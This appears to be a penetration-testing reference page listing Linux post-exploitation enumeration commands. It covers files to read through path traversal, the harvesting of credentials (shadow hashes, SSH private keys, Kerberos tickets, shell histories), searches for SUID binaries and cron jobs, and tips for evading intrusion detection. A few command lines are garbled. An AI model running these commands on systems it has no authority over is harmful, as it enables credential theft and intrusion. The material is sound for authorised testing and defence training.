Linux Post Exploitation Command List

Collection Information

Blind Files

things to pull when all you can do is blindly read like in LFI/dir traversal (Don’t forget %00!)

File

Contents and Reason

/etc/resolv.conf

Contains the current name servers (DNS) for the system. This is a globally readable file that is less likely to trigger IDS alerts than /etc/passwd

/etc/motd

Message of the Day

/etc/issue

current version of distro

/etc/passwd

List of local users

/etc/shadow

List of users’ passwords’ hashes (requires root)

/home/xxx/.bash_history

Will give you some directory context

System

Command

Description and/or Reason

uname -a

Prints the kernel version, arch, sometimes distro

ps aux

List all running processes

top -n 1 -d

Print process, 1 is a number of lines

id

Your current username, groups

arch, uname -m

Kernel processor architecture

w

who is connected, uptime and load avg

who -a

uptime, runlevel, tty, proceses etc.

gcc -v

Returns the version of GCC.

mysql --version

Returns the version of MySQL.

perl -v

Returns the version of Perl.

ruby -v

Returns the version of Ruby.

python --version

Returns the version of Python.

df -k

mounted fs, size, % use, dev and mount point

mount

mounted fs

last -a

Last users logged on

lastcomm

lastlog

lastlogin (BSD)

getenforce

Get the status of SELinux (Enforcing, Permissive or Disabled)

dmesg

Informations from the last system boot

lspci

prints all PCI buses and devices

lsusb

prints all USB buses and devices

lscpu

prints CPU information

lshw

list hardware information

ex

cat /proc/cpuinfo

cat /proc/meminfo

du -h --max-depth=1 /

note: can cause heavy disk i/o

which nmap

locate a command (ie nmap or nc)

locate bin/nmap

locate bin/nc

jps -l

java -version

Returns the version of Java.

Networking

Command

Description and/or Reason

hostname -f

ip addr show

ip ro show

ifconfig -a

route -n

cat /etc/network/interfaces

iptables -L -n -v

iptables -t nat -L -n -v

ip6tables -L -n -v

iptables-save

netstat -anop

netstat -r

netstat -nltupw

root with raw sockets

arp -a

lsof -nPi

cat /proc/net/*

more discreet, all the information given by the above commands can be found by looking into the files under /proc/net, and this approach is less likely to trigger monitoring or other stuff

User Accounts

Command

Description and/or Reason

cat /etc/passwd

local accounts

cat /etc/shadow

password hashes on Linux

/etc/security/passwd

password hashes on AIX

cat /etc/group

groups (or /etc/gshadow)

getent passwd

should dump all local, LDAP, NIS, whatever the system is using

getent group

same for groups

pdbedit -L -w

Samba’s own database

pdbedit -L -v

cat /etc/aliases

mail aliases

find /etc -name aliases

getent aliases

ypcat passwd

displays NIS password file

Obtain user's information

ls -alh /home/*/    
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/\*/.*hist* # you can learn a lot from this
find /home/\*/.vnc /home/\*/.subversion -type f 
grep ^ssh /home/*/.*hist*
grep ^telnet /home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
sudo -l # if sudoers is not. readable, this sometimes works per user
crontab -l
cat /home/*/.mysql_history
sudo -p (allows the user to define what the password prompt will be, useful for fun customization with aliases or shell scripts)

Credentials

File/Folder

Description and/or Reason

/home/*/.ssh/id*

SSH keys, often passwordless

/tmp/krb5cc_*

Kerberos tickets

/tmp/krb5.keytab

Kerberos tickets

/home/*/.gnupg/secring.gpgs

PGP keys

Configs

ls -aRl /etc/ * awk '$1 ~ /w.$/' * grep -v lrwx 2>/dev/nullte    
cat /etc/issue{,.net}
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.confcda
cat /etc/inetd.conf    
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
find /etc/sysconfig/ -type f -exec cat {} \;

Determine Distro

File

Description and/or Reason

uname -a

often hints at it pretty well

lsb_release -d

Generic command for all LSB distros

/etc/os-release

Generic for distros using “systemd”

/etc/issue

Generic but often modified

cat /etc/*release

/etc/SUSE-release

Novell SUSE

/etc/redhat-release, /etc/redhat_version

Red Hat

/etc/fedora-release

Fedora

/etc/slackware-release, /etc/slackware-version

Slackware

/etc/debian_release, /etc/debian_version

Debian

/etc/mandrake-release

Mandrake

/etc/sun-release

Sun JDS

/etc/release

Solaris/Sparc

/etc/gentoo-release

Gentoo

/etc/arch-release

Arch Linux (file will be empty)

arch

OpenBSD; sample: “OpenBSD.amd64”

Installed Packages

rpm -qa --last | head
yum list | grep installed
Debian
  * dpkg -l
  * dpkg -l | grep -i “linux-image”
  * dpkg --get-selections
{Free,Net}BSD: pkg_info
Solaris: pkginfo
Gentoo: cd /var/db/pkg/ && ls -d */*    # always works
Arch Linux: pacman -Q

Package Sources

cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat /etc/yum.conf

Finding Important Files

ls -dlR */
s -alR | grep ^d
find /var -type d
ls -dl \`find /var -type d\`
ls -dl \`find /var -type d\` | grep -v root
find /var ! -user root -type d -ls
find /var/log -type f -exec ls -la {} \;
find / -perm -4000 (find all suid files)
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
cd /home/; treels /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep .tar$  # Remember to updatedb before running locate
locate tgz | grep .tgz$
locate sql | grep .sql$
locate settings | grep .php$  
locate config.inc | grep .php$
ls /home/\*/id*
.properties | grep .properties # java config files
locate .xml | grep .xml # java/.net config files
find /sbin /usr/sbin /opt /lib \`echo $PATH | ‘sed s/:/ /g’\` -perm /6000  -ls # find suids
locate rhosts

What jobs are scheduled? (Cronjobs)

crontab -l 2>/dev/null
ls -alh /var/spool/cron 2>/dev/null
ls -al /etc/ | grep cron 2>/dev/null
ls -al /etc/cron* 2>/dev/null
cat /etc/cron* 2>/dev/null
cat /etc/at.allow 2>/dev/null
cat /etc/at.deny 2>/dev/null
cat /etc/cron.allow 2>/dev/null
cat /etc/cron.deny 2>/dev/null
cat /etc/crontab 2>/dev/null
cat /etc/anacrontab 2>/dev/null
cat /var/spool/cron/crontabs/root 2>/dev/null

The following command will list processes running by root, permissions and NFS exports.

echo 'services running as root'; ps aux | grep root;  echo 'permissions'; ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
PreviousLinux post exploitation scriptsNextGeneral

Last updated